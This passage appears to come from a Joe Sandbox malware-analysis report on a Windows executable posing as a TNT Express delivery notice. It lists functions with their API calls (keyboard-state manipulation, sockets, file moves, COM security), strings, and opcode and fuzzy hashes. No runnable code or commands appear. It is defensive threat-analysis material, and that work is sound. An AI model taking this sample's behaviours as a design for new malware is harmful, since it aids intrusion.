MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,009017FB,?,009017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 009016E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,009017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 009016FB

Part of subcall function 008F3820: RtlAllocateHeap.NTDLL(00000000,?,00991444,?,008DFDF5,?,?,008CA976,00000010,00991440,008C13FC,?,008C13C6,?,008C1129), ref: 008F3852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,009017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00901777
__freea.LIBCMT ref: 009017A2
__freea.LIBCMT ref: 009017AE

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: cbf7912b19a15d0f9a1be74ee2c4b28180c4e1ce7a65aa01e54554ffa59d3318
Instruction ID: 7fbf98720a0d46016b9151f06113df98e5c8bcb2368a0ed47a973dfb07467253
Opcode Fuzzy Hash: cbf7912b19a15d0f9a1be74ee2c4b28180c4e1ce7a65aa01e54554ffa59d3318
Instruction Fuzzy Hash: 52918272E102169EDB208EB4CC85AEE7BB9EF89710F184659F905EB1D1DB35DD80CB60

Function 00944523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00944648
VariantInit.OLEAUT32(?), ref: 00944749
VariantClear.OLEAUT32(?), ref: 00944753
VariantClear.OLEAUT32(?), ref: 009447B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0094472C
Null Object assignment in FOR..IN loop, xrefs: 009445D8, 00944706, 009447BE

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 5fb94cb947415b6f09975b20e8379ba768cb6ad2f64cd7acd7db2ff6ca24b405
Instruction ID: 2108c1b6c8ccdd987a11e5c45990e4b7b7d565c2c6f3a37cfc4e6f237f6cd7c3
Opcode Fuzzy Hash: 5fb94cb947415b6f09975b20e8379ba768cb6ad2f64cd7acd7db2ff6ca24b405
Instruction Fuzzy Hash: 2F917E71A00219AFDF20CFA5C888FAEBBB8FF46714F108559F515AB281D7749945CFA0

Function 00931187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0093125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00931284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 009312A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009312D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0093135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009313C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00931430

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: d907012e556e1caa2e6d56c39cf9fea981c57e4932682e0d6c1c0c490f913bcc
Instruction ID: 9fb80843a60f3fd3581822e0148e523cf8301675c87e2dad13834f3b39007650
Opcode Fuzzy Hash: d907012e556e1caa2e6d56c39cf9fea981c57e4932682e0d6c1c0c490f913bcc
Instruction Fuzzy Hash: 5991E171A00209AFDB00DFA8C884BBEB7B9FF45325F104429E951EB2B1D778A941CF91

Function 008D948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 8db83b3e3fe81bbfed9a8a7f974a4b0a37f4862cdfa11eeedaa0993eb16a47cf
Instruction ID: ca291a3196703a154cee0614d73f2f86c900c0c9e21e94fd7c1b48723bb5f74f
Opcode Fuzzy Hash: 8db83b3e3fe81bbfed9a8a7f974a4b0a37f4862cdfa11eeedaa0993eb16a47cf
Instruction Fuzzy Hash: 7A913671E0421AEFCB10CFA9DC84AEEBBB9FF48320F148556E555B7251D374AA42CB60

Function 00943947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0094396B
CharUpperBuffW.USER32(?,?), ref: 00943A7A
_wcslen.LIBCMT ref: 00943A8A
VariantClear.OLEAUT32(?), ref: 00943C1F

Part of subcall function 00930CDF: VariantInit.OLEAUT32(00000000), ref: 00930D1F
Part of subcall function 00930CDF: VariantCopy.OLEAUT32(?,?), ref: 00930D28
Part of subcall function 00930CDF: VariantClear.OLEAUT32(?), ref: 00930D34

Strings

AUTOIT.ERROR, xrefs: 00943A80, 00943A85
Incorrect Parameter format, xrefs: 009439A6, 00943BA1

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 0c16fdeec65b04690086efb9fcbe3a68a69e20f9769000f918b2c10690db2d30
Instruction ID: 28c216d2762696c9cbe74b9db10fa469d4b803091d13caf312cf73013437a808
Opcode Fuzzy Hash: 0c16fdeec65b04690086efb9fcbe3a68a69e20f9769000f918b2c10690db2d30
Instruction Fuzzy Hash: 419125756083059FC704EF68C481A6AB7E9FF88314F14896DF88A9B351DB31EE45CB92

Function 00944BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0092000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0091FF41,80070057,?,?,?,0092035E), ref: 0092002B
Part of subcall function 0092000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0091FF41,80070057,?,?), ref: 00920046
Part of subcall function 0092000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0091FF41,80070057,?,?), ref: 00920054
Part of subcall function 0092000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0091FF41,80070057,?), ref: 00920064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00944C51
_wcslen.LIBCMT ref: 00944D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00944DCF
CoTaskMemFree.OLE32(?), ref: 00944DDA

Strings

NULL Pointer assignment, xrefs: 00944E23, 00944E52

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: c852be7306d968324a4b47470aca08c51d6f9d2bc814bd9068c4a00d6b53169f
Instruction ID: 0f67e82ee4a9b9f84afe9c6acc875d60d79ef7c11039f44fab215271664d0b99
Opcode Fuzzy Hash: c852be7306d968324a4b47470aca08c51d6f9d2bc814bd9068c4a00d6b53169f
Instruction Fuzzy Hash: B7912571D0021DAFDF14DFA4D891EEEB7B8FF48304F108569E919A7291EB349A448FA1

Function 009520FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00952183
GetMenuItemCount.USER32(00000000), ref: 009521B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009521DD
_wcslen.LIBCMT ref: 00952213
GetMenuItemID.USER32(?,?), ref: 0095224D
GetSubMenu.USER32(?,?), ref: 0095225B

Part of subcall function 00923A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00923A57
Part of subcall function 00923A3D: GetCurrentThreadId.KERNEL32 ref: 00923A5E
Part of subcall function 00923A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009225B3), ref: 00923A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009522E3

Part of subcall function 0092E97B: Sleep.KERNEL32 ref: 0092E9F3

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: b2367a55056139f260d1b26b79153126a18713b02ebd29b4c0d60e9651c12421
Instruction ID: 35aa8cc986b91dca098e947b891b1bcdb445e4bd298113c8cc24d46eccb0a233
Opcode Fuzzy Hash: b2367a55056139f260d1b26b79153126a18713b02ebd29b4c0d60e9651c12421
Instruction Fuzzy Hash: CB71AF75A04205AFCB14DF6AC881AAEB7F5FF89311F148459E826EB351DB34EE418F90

Function 0092AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0092AEF9
GetKeyboardState.USER32(?), ref: 0092AF0E
SetKeyboardState.USER32(?), ref: 0092AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0092AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0092AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0092AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0092B020

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 0f996cbd233ba5b91e5deecfa00652533689a98ee36a7b6cc57acc0bf7240914
Instruction ID: 2677808971f5381235438c269d9ec4ce545d20842e9fafc0a7dc460426f1d9b9
Opcode Fuzzy Hash: 0f996cbd233ba5b91e5deecfa00652533689a98ee36a7b6cc57acc0bf7240914
Instruction Fuzzy Hash: CA51E2A16447E53EFB378234AD45BBABFED5B06304F088489E1E9958C6C3D8ACC8D751

Function 0092ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0092AD19
GetKeyboardState.USER32(?), ref: 0092AD2E
SetKeyboardState.USER32(?), ref: 0092AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0092ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0092ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0092AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0092AE38

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 2faa121096fc0cfa60daf2fb42dc6cdcc7536db789950e2ad04deadc5f512c24
Instruction ID: b9419148002ea8d80bfdf642380059193d2a2474e06d235d76265296c7d295a5
Opcode Fuzzy Hash: 2faa121096fc0cfa60daf2fb42dc6cdcc7536db789950e2ad04deadc5f512c24
Instruction Fuzzy Hash: 2051D5A25087E53EFB3683349C55B7ABEEC5B46300F088488E1D5568C7D294EC89E752

Function 008F542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00903CD6,?,?,?,?,?,?,?,?,008F5BA3,?,?,00903CD6,?,?), ref: 008F5470
__fassign.LIBCMT ref: 008F54EB
__fassign.LIBCMT ref: 008F5506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00903CD6,00000005,00000000,00000000), ref: 008F552C
WriteFile.KERNEL32(?,00903CD6,00000000,008F5BA3,00000000,?,?,?,?,?,?,?,?,?,008F5BA3,?), ref: 008F554B
WriteFile.KERNEL32(?,?,00000001,008F5BA3,00000000,?,?,?,?,?,?,?,?,?,008F5BA3,?), ref: 008F5584

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 079569b0d3d2c817d375fa0820fb6d150bfc1bd2c8f3e1754f2ff197d0a0ced4
Instruction ID: 81a53790de69961a785c49ce144853bacb8f019ff45470e55d29fe7133a7c6d5
Opcode Fuzzy Hash: 079569b0d3d2c817d375fa0820fb6d150bfc1bd2c8f3e1754f2ff197d0a0ced4
Instruction Fuzzy Hash: 7B519EB1A0464DAFDB10CFB8D895AEEBBF9FF09300F14411AEA55E7291D7309A41CB60

Function 008E2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 008E2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 008E2D53
_ValidateLocalCookies.LIBCMT ref: 008E2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 008E2E0C
_ValidateLocalCookies.LIBCMT ref: 008E2E61

Strings

csm, xrefs: 008E2DF6

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: e4bf0e168b48d6d814c790e427479e78ca97b3a3e0a9274f66200ecb29774e3e
Instruction ID: 97a66cb9030e1753b801a9d32ae8962690e97d2596c74e100ae0f7b302799e3a
Opcode Fuzzy Hash: e4bf0e168b48d6d814c790e427479e78ca97b3a3e0a9274f66200ecb29774e3e
Instruction Fuzzy Hash: BF41B334A0025DABCF10DF6ACC45A9EBBA8FF46314F148155E914EB392D7719E01CB91

Function 009410B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0094304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0094307A
Part of subcall function 0094304E: _wcslen.LIBCMT ref: 0094309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00941112
WSAGetLastError.WSOCK32 ref: 00941121
WSAGetLastError.WSOCK32 ref: 009411C9
closesocket.WSOCK32(00000000), ref: 009411F9

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 2ab1416546bc91c3aa17fc435a195d5d830cdc4bfc0458d0270b39eb1854841b
Instruction ID: 88828b5ea9c5a01337ac2f0d8da5e6e00dba8ef705e7a9c89118e3b78eb92fe4
Opcode Fuzzy Hash: 2ab1416546bc91c3aa17fc435a195d5d830cdc4bfc0458d0270b39eb1854841b
Instruction Fuzzy Hash: 07410271604204AFDB109F28C884FAABBE9FF49324F148059FE099B291D774ED81CBE1

Function 0092CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0092DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0092CF22,?), ref: 0092DDFD

Part of subcall function 0092DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0092CF22,?), ref: 0092DE16

lstrcmpiW.KERNEL32(?,?), ref: 0092CF45
MoveFileW.KERNEL32(?,?), ref: 0092CF7F
_wcslen.LIBCMT ref: 0092D005
_wcslen.LIBCMT ref: 0092D01B
SHFileOperationW.SHELL32(?), ref: 0092D061

Strings

\*.*, xrefs: 0092CFF3

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 9f4fc86531f2d4e94821aa1fa6673771144f9676d2077150bd24e269791d25d6
Instruction ID: 67e12424604764b3055bc97aaa4c21bc6164687d68f70d7cb2920043e1aafe9a
Opcode Fuzzy Hash: 9f4fc86531f2d4e94821aa1fa6673771144f9676d2077150bd24e269791d25d6
Instruction Fuzzy Hash: 724155B19452285FDF12EBA4DA81BDDB7BCAF48380F1000E6E545EB156EA34A644CB50

Function 00952DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00952E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00952E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00952E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00952EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00952EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00952EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00952F0B

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: d6efec62f12c5fc74a207bd98385240b97a776eb10f8d5fd7db1b0c906e46564
Instruction ID: 7670652c9dee1467dbe4550410bf8dda961ac20927fa9abdb9195cb5bd70c926
Opcode Fuzzy Hash: d6efec62f12c5fc74a207bd98385240b97a776eb10f8d5fd7db1b0c906e46564
Instruction Fuzzy Hash: 82313530619241AFDB21CF5AEC86F6937E8FB8A712F140165F9008F2B1CB71AC48EB00

Function 00927726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00927769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0092778F
SysAllocString.OLEAUT32(00000000), ref: 00927792
SysAllocString.OLEAUT32(?), ref: 009277B0
SysFreeString.OLEAUT32(?), ref: 009277B9
StringFromGUID2.OLE32(?,?,00000028), ref: 009277DE
SysAllocString.OLEAUT32(?), ref: 009277EC

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 1446a600239c2f4d11b6ede9c7a4ec2be721509f3a056f7dc3b68b5fc016f9d3
Instruction ID: bf2fadd60d5aa8de766f84b57a63d982107e8196e4623ce203b50657b1e6fba3
Opcode Fuzzy Hash: 1446a600239c2f4d11b6ede9c7a4ec2be721509f3a056f7dc3b68b5fc016f9d3
Instruction Fuzzy Hash: EA21B076608329AFDB10DFA9EC88CBBB3ACFB093647008525FA05EB265D670DC419760

Function 009277FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00927842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00927868
SysAllocString.OLEAUT32(00000000), ref: 0092786B
SysAllocString.OLEAUT32 ref: 0092788C
SysFreeString.OLEAUT32 ref: 00927895
